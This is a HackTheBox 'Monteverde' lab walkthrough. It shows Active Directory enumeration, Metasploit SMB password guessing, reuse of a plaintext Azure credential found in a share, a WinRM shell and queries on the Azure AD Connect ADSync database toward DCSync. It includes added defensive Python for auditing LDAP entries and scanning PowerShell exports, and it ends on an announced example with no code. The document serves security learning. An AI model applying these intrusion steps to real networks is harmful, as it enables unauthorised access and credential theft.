
Monteverde Writeup (HackTheBox)


Enumeration #

Port Scan #

As usual, we start off with a port scan.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ sudo nmap -Pn -sS -p1-10000 -sV -T5 10.10.10.172 -nv
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-11 19:29:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing

This looks like a domain controller, so chances are there's going to be some Active Directory angle to this box, but let's see.

SMB #

Anonymous SMB did not work.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbclient -L 10.10.10.172 -U '' -N

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u ''
[+] IP: 10.10.10.172:445 Name: 10.10.10.172

LDAP #

Next, we use ldapsearch to enumerate LDAP. First we retrieve the naming contexts (which give us the search base), and then we try an anonymous bind against the server.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ ldapsearch -x -h 10.10.10.172 -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ ldapsearch -x -h 10.10.10.172 -D '' -w '' -b "DC=MEGABANK,DC=LOCAL" | tee ldap.txt
# extended LDIF
#
# LDAPv3
# base <DC=MEGABANK,DC=LOCAL> with scope subtree
...
# numResponses: 271
# numEntries: 267
# numReferences: 3

The anonymous bind worked, and gave back plenty of information. For now, let's try and extract all the logon names we can.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ grep 'samaccountname' ldap.txt -i | cut -d ' ' -f 2 | tee users.txt
Guest
...
AAD_987d7f2f57d2
...
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
...
dgalanos
roleary
smorgan

We can attempt to corroborate this list by anonymously using rpcclient.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ rpcclient -U '' 10.10.10.172 -N
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

Foothold #

Back to SMB #

Now we have many possible usernames, but still no credentials to work with. Before beginning a password spray attack, where we try common passwords against all the users we found, let's try something simpler. We'll use msfconsole to attempt to log in with both blank passwords and the username as the password.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.172 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
...
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: '.\SABatchJobs:S********s'
...
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Thank goodness for lazy administrators, right? Let's see what this newfound access buys us. Here is what we know from LDAP:

# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: SABatchJobs
givenName: SABatchJobs
distinguishedName: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103124846.0Z
whenChanged: 20200611182530.0Z
displayName: SABatchJobs
uSNCreated: 41070
uSNChanged: 65568
name: SABatchJobs
objectGUID:: A2gA4Cnwv0eHK29I4GEMLQ==
userAccountControl: 66048
badPwdCount: 60
codePage: 0
countryCode: 0
badPasswordTime: 132363742375357201
lastLogoff: 0
lastLogon: 132363742212690386
pwdLastSet: 132225293263922346
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKgoAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: SABatchJobs
sAMAccountType: 805306368
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103124846.0Z
dSCorePropagationData: 16010101000000.0Z
mS-DS-ConsistencyGuid:: A2gA4Cnwv0eHK29I4GEMLQ==
lastLogonTimestamp: 132363735309034440
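The grep and cut pipeline used earlier works for this dump, but ldapsearch folds long values onto continuation lines and writes binary attributes base64-encoded after a double colon, so a proper LDIF parser is worth having. What follows is an added example (editor's Python, not the writeup author's code and not from any tool named on this page) that parses LDIF and reads the SABatchJobs entry the way a defender auditing the directory would: it decodes userAccountControl into flag names, converts the FILETIME timestamps, extracts the RID from objectSid (it should agree with what rpcclient reported), and treats a high badPwdCount on an account that was never locked out as evidence of a spray-friendly lockout policy. The sample LDIF is constructed from the entry above, abridged, and the scan date is assumed to be the date of the session.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# Constructed sample: the SABatchJobs entry from the ldapsearch dump above,
# abridged, with distinguishedName folded onto a continuation line the way
# ldapsearch wraps long values (a leading space marks the continuation).
SAMPLE_LDIF = """\
# extended LDIF
#
# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: user
cn: SABatchJobs
distinguishedName: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCA
 L
userAccountControl: 66048
badPwdCount: 60
badPasswordTime: 132363742375357201
pwdLastSet: 132225293263922346
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKgoAAA==
sAMAccountName: SABatchJobs

# search result
search: 2
result: 0 Success
"""
WRITEUP_DATE = datetime(2020, 6, 11, tzinfo=timezone.utc)   # assumed scan date used by demo()
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
NEVER = (0, 0x7FFFFFFFFFFFFFFF)                                # FILETIME values meaning 'never'
UAC_FLAGS = {                                                  # subset of userAccountControl bits
    0x000002: "ACCOUNTDISABLE", 0x000020: "PASSWD_NOTREQD", 0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD", 0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

def unfold(text):
    """Join LDIF continuation lines (a line starting with one space continues the previous)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def parse_ldif(text):
    """One dict per entry (attribute -> list of values). Comments are skipped,
    'attr:: value' is base64-decoded to bytes, and the trailing dn-less block
    ldapsearch prints ('search:', 'result:') is dropped."""
    entries, current = [], {}
    for line in unfold(text) + [""]:
        if not line:                        # blank line terminates a record
            if "dn" in current:
                entries.append(current)
            current = {}
        elif line.startswith("#"):
            continue
        else:
            attr, sep, rest = line.partition(":")
            if not sep:
                continue
            value = base64.b64decode(rest[1:].strip()) if rest.startswith(":") else rest.strip()
            current.setdefault(attr, []).append(value)
    return entries

def logon_names(entries):
    """Robust replacement for the grep/cut pipeline used in the enumeration step."""
    return [e["sAMAccountName"][0] for e in entries if "sAMAccountName" in e]

def decode_uac(value):
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def filetime_to_datetime(ft):
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return None if ft in NEVER else FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def decode_sid(blob):
    """Binary SID -> 'S-1-5-21-...-RID': revision, 48-bit big-endian authority,
    then little-endian 32-bit sub-authorities; the last one is the RID."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def audit_account(entry, now):
    """Decode the hygiene-relevant fields of one user entry and list findings."""
    def first(attr, default="0"):
        return entry.get(attr, [default])[0]
    flags = decode_uac(int(first("userAccountControl")))
    pwd_set = filetime_to_datetime(int(first("pwdLastSet")))
    sid = decode_sid(entry["objectSid"][0])
    bad = int(first("badPwdCount"))
    findings = []
    if "DONT_EXPIRE_PASSWORD" in flags:
        findings.append("password never expires")
    if "PASSWD_NOTREQD" in flags:
        findings.append("password not required")
    if pwd_set and (now - pwd_set).days > 365:
        findings.append("password older than a year")
    if bad >= 10 and int(first("lockoutTime")) == 0:   # many failures, never locked out
        findings.append("%d bad passwords without lockout: no effective lockout policy" % bad)
    return {"sAMAccountName": first("sAMAccountName", ""), "sid": sid,
            "rid": int(sid.rsplit("-", 1)[1]), "uacFlags": flags,
            "pwdLastSet": pwd_set, "badPwdCount": bad, "findings": findings}

def demo():
    """Audit every entry in the sample dump as of the assumed scan date."""
    return [audit_account(e, WRITEUP_DATE) for e in parse_ldif(SAMPLE_LDIF)]

if __name__ == "__main__":
    for report in demo():
        print(report["sAMAccountName"], report["sid"], ", ".join(report["uacFlags"]))
        for finding in report["findings"]:
            print("  -", finding)
```

Run against the full ldap.txt, `parse_ldif` plus `logon_names` gives the same user list as the pipeline but without missing folded or base64 values, and the audit output for SABatchJobs shows the two things that made the foothold possible: a password set to never expire on a service account, and sixty failed logons that never produced a lockout.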

Not too much to go off there. Let's see whether we have access to any SMB shares.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'S********s'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY

Quite a few to go through!

User #

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbclient //10.10.10.172/azure_uploads -U 'SABatchJobs%S********s'
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Fri Jan 3 07:43:06 2020
.. D 0 Fri Jan 3 07:43:06 2020

524031 blocks of size 4096. 519955 blocks available

Nothing in the azure_uploads share. Let's try users$ next.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ sudo smbclient //10.10.10.172/users$ -U 'SABatchJobs%S********s'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> recurse on
smb: \> dir
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020

\dgalanos
. D 0 Fri Jan 3 08:12:30 2020
.. D 0 Fri Jan 3 08:12:30 2020

\mhope
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

\roleary
. D 0 Fri Jan 3 08:10:30 2020
.. D 0 Fri Jan 3 08:10:30 2020

\smorgan
. D 0 Fri Jan 3 08:10:24 2020
.. D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> get mhope\azure.xml
getting file \mhope\azure.xml of size 1212 as mhope\azure.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> exit

Awesome, one whole file! What's inside?

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ cat mhope\\azure.xml
...
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
...
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
...
<S N="Password">4********$</S>
...

A plaintext credential! There's no indication of which user this belongs to, but let's assume it belongs to mhope since it was in their user directory.
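The azure.xml above is what Export-Clixml produces when a PowerShell object is piped to a file, and the detail that matters is the element type: `<S N="Password">` is a plain string, whereas a SecureString property would have been written as an `<SS>` DPAPI blob that only the exporting user on that machine can decrypt. As an added example (editor's code, not the writeup author's), here is a small scanner that walks a directory such as a mounted users$ share, parses each XML file as CLIXML and reports every object carrying a secret-looking property, with the value masked. Both sample files are constructed: one mirrors the PSADPasswordCredential fragments shown above with a placeholder password, the other is a PSCredential export included for contrast.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
SECRET_NAME = re.compile(r"password|secret|token|apikey|accesskey", re.I)

# Constructed sample mirroring the fragments of mhope's azure.xml shown above:
# a PSADPasswordCredential whose Password property is a plain <S> string.
# The value is a placeholder, not the box's credential.
SAMPLE_AZURE_XML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-PASSWORD</S>
    </Props>
  </Obj>
</Objs>"""

# Constructed contrast case: a PSCredential written by Export-Clixml, where
# PowerShell serialises the SecureString as a DPAPI blob (<SS>) bound to the
# exporting user and machine instead of as plaintext.
SAMPLE_PSCREDENTIAL_XML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297ebPLACEHOLDER</SS>
    </Props>
  </Obj>
</Objs>"""

def _tag(local):
    return "{%s}%s" % (PS_NS, local)

def mask(value):
    """Never echo the secret itself; keep a length hint only."""
    return "%s***(%d chars)" % (value[:1], len(value)) if value else "(empty)"

def scan_clixml(xml_text, path="<memory>"):
    """One finding per secret-looking property of every object in a CLIXML document."""
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings                      # not XML at all
    if root.tag != _tag("Objs"):
        return findings                      # XML, but not a PowerShell export
    for obj in root.iter(_tag("Obj")):
        types = [t.text for t in obj.findall("%s/%s" % (_tag("TN"), _tag("T")))]
        props = obj.find(_tag("Props"))
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            if not SECRET_NAME.search(name):
                continue
            kind = prop.tag.rsplit("}", 1)[-1]            # S = string, SS = SecureString
            storage = {"S": "plaintext", "SS": "dpapi-securestring"}.get(kind, kind)
            findings.append({"path": path, "type": types[0] if types else "?",
                             "property": name, "storage": storage,
                             "preview": mask(prop.text or "")})
    return findings

def scan_tree(directory):
    """Scan every .xml/.clixml file under a directory (e.g. a mounted users$ share)."""
    findings = []
    for dirpath, _, files in os.walk(directory):
        for name in files:
            if name.lower().endswith((".xml", ".clixml")):
                path = os.path.join(dirpath, name)
                # Export-Clixml writes UTF-8 with a BOM; utf-8-sig strips it.
                with open(path, encoding="utf-8-sig", errors="replace") as fh:
                    findings.extend(scan_clixml(fh.read(), path))
    return findings

def demo():
    """Write the two constructed samples into a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "mhope"))
        with open(os.path.join(tmp, "mhope", "azure.xml"), "w") as fh:
            fh.write(SAMPLE_AZURE_XML)
        with open(os.path.join(tmp, "cred.xml"), "w") as fh:
            fh.write(SAMPLE_PSCREDENTIAL_XML)
        return sorted(scan_tree(tmp), key=lambda f: f["path"])

if __name__ == "__main__":
    for f in demo():
        print("%(path)s: %(type)s.%(property)s stored as %(storage)s (%(preview)s)" % f)
```

A plaintext finding is the one worth acting on immediately (rotate the credential, then find out how the file got there); a dpapi-securestring finding is still worth a ticket, since the exporting user's DPAPI keys make it recoverable by anyone who can run code as that user on that host.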

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ smbmap -H 10.10.10.172 -u mhope -p '4********$'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY

And would you look at that, we've successfully logged in. What does LDAP have to say about mhope?

# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
...
memberOf: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
memberOf: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
...

Looks like he's in the Remote Management Users group, meaning he actually has the ability to log in over WinRM (port 5985). To do so, let's use evil-winrm.

msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ evil-winrm -i 10.10.10.172 -u 'megabank\mhope' -p '4********$'
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> dir
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> dir


Directory: C:\Users\mhope


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2020 5:35 AM .Azure
d-r--- 1/3/2020 5:24 AM 3D Objects
d-r--- 1/3/2020 5:24 AM Contacts
d-r--- 6/11/2020 3:06 PM Desktop
d-r--- 1/3/2020 5:24 AM Documents
d-r--- 1/3/2020 5:24 AM Downloads
d-r--- 1/3/2020 5:24 AM Favorites
d-r--- 1/3/2020 5:24 AM Links
d-r--- 1/3/2020 5:24 AM Music
d-r--- 1/3/2020 5:24 AM Pictures
d-r--- 1/3/2020 5:24 AM Saved Games
d-r--- 1/3/2020 5:24 AM Searches
d-r--- 1/3/2020 5:24 AM Videos


*Evil-WinRM* PS C:\Users\mhope> dir Desktop


Directory: C:\Users\mhope\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt


*Evil-WinRM* PS C:\Users\mhope> type Desktop\user.txt
496........2f2

Privilege Escalation #

Something that I've learned doing these types of Windows boxes is that group memberships are often useful to look at. We saw that mhope was a member of Azure Admins, whatever that is. We also saw the string Microsoft.Azure.Commands.ActiveDirectory in the file where we found mhope's password.

There's also this interesting username with hex characters in it.

*Evil-WinRM* PS C:\Users\mhope\Documents> dir C:\Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 2:53 PM AAD_987d7f2f57d2
d----- 1/2/2020 9:35 PM Administrator
d----- 1/3/2020 5:31 AM mhope
d-r--- 1/2/2020 9:35 PM Public

Furthermore, we see something called Azure Active Directory Connect and Azure AD Sync while performing our recon of the box.

*Evil-WinRM* PS C:\Users\mhope\Documents> dir "C:\Program Files"


Directory: C:\Program Files


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:31 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShell

A whole lot of searching and reading later, we stumble across this very informative article.

What We're Doing #

If I understand the article correctly - and Azure AD is definitely something I need to research more - on-premises Active Directory credentials can be used to authenticate to the Active Directory hosted in Azure (sort of like a domain controller as a service, I guess). For that to work, the on-site domain controller needs a way to synchronize AD credentials with the cloud. The Azure AD Connect installation therefore creates a new account whose name contains a run of hex characters; this is the account that holds the rights to perform DRS (Directory Replication Services), and it is the one that does the synchronization.

The article details how we can go about decrypting the password for this account, at which point you could use the account to perform a DCSync operation of your own and get domain admin hashes.

Exploitation #

We see that the first line in the author's PowerShell script is to create a SQL connection using a connection string.

```powershell
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
```

So, I set off to figure out said connection string for myself. First, I verified that a SQL Server instance was even running.

*Evil-WinRM* PS C:\Users\mhope\Documents> netstat -ano | findstr "LISTEN"
...
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 3576
...

With that confirmed, next I tried issuing a SQL command from PowerShell to see if I could even execute SQL queries.

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT GETDATE() AS TimeOfQuery"

TimeOfQuery
-----------
6/11/2020 7:20:03 PM

From here I did some manual recon, starting by listing the databases.

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT name FROM master.dbo.sysdatabases"

name
----
master
tempdb
model
msdb
ADSync

Well, the database named ADSync looks promising and matches everything I've read on the Internet so far - so at least I'm communicating with the right SQL instance. Next I listed the tables.

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "SELECT * FROM ADSync.INFORMATION_SCHEMA.TABLES"

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ADSync dbo mms_metaverse BASE TABLE
ADSync dbo mms_metaverse_lineageguid BASE TABLE
ADSync dbo mms_metaverse_lineagedate BASE TABLE
ADSync dbo mms_connectorspace BASE TABLE
ADSync dbo mms_cs_object_log BASE TABLE
ADSync dbo mms_cs_link BASE TABLE
ADSync dbo mms_management_agent BASE TABLE
ADSync dbo mms_synchronization_rule BASE TABLE
ADSync dbo mms_csmv_link BASE TABLE
ADSync dbo mms_metaverse_multivalue BASE TABLE
ADSync dbo mms_mv_link BASE TABLE
ADSync dbo mms_partition BASE TABLE
ADSync dbo mms_watermark_history BASE TABLE
ADSync dbo mms_run_history BASE TABLE
ADSync dbo mms_run_profile BASE TABLE
ADSync dbo mms_server_configuration BASE TABLE
ADSync dbo mms_step_history BASE TABLE
ADSync dbo mms_step_object_details BASE TABLE

Perfect, mms_server_configuration is one of the tables that we need in this PowerShell script. Now, to figure out what connection string I can use to execute this same command. Going through the list of connection strings found here, I eventually formulated the following string which worked.

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-Sqlcmd -Query "select * from INFORMATION_SCHEMA.TABLES;" -ConnectionString "Data Source=MONTEVERDE;Initial Catalog=ADSync;Trusted_Connection=True"

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ADSync dbo mms_metaverse BASE TABLE
ADSync dbo mms_metaverse_lineageguid BASE TABLE
ADSync dbo mms_metaverse_lineagedate BASE TABLE
ADSync dbo mms_connectorspace BASE TABLE
ADSync dbo mms_cs_object_log BASE TABLE
ADSync dbo mms_cs_link BASE TABLE
ADSync dbo mms_management_agent BASE TABLE
ADSync dbo mms_synchronization_rule BASE TABLE
ADSync dbo mms_csmv_link BASE TABLE
ADSync dbo mms_metaverse_multivalue BASE TABLE
ADSync dbo mms_mv_link BASE TABLE
ADSync dbo mms_partition BASE TABLE
ADSync dbo mms_watermark_history BASE TABLE
ADSync dbo mms_run_history BASE TABLE
ADSync dbo mms_run_profile BASE TABLE
ADSync dbo mms_server_configuration BASE TABLE
ADSync dbo mms_step_history BASE TABLE
ADSync dbo mms_step_object_details BASE TABLE
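The connection string is the one place where this whole step can quietly go wrong, so as an added example (editor's code, not from the writeup or from the referenced script) here is a small parser for SqlClient connection strings. It normalises the keyword synonyms SqlClient accepts (Server/Data Source, Database/Initial Catalog, Trusted_Connection/Integrated Security, uid/User ID, pwd/Password), classifies what kind of instance a Data Source value names, and flags the settings a reviewer would not want to find in a deployed config: embedded credentials and disabled transport encryption. The two strings from the text are used as they appear above; the WEAK_EXAMPLE string is constructed for contrast.

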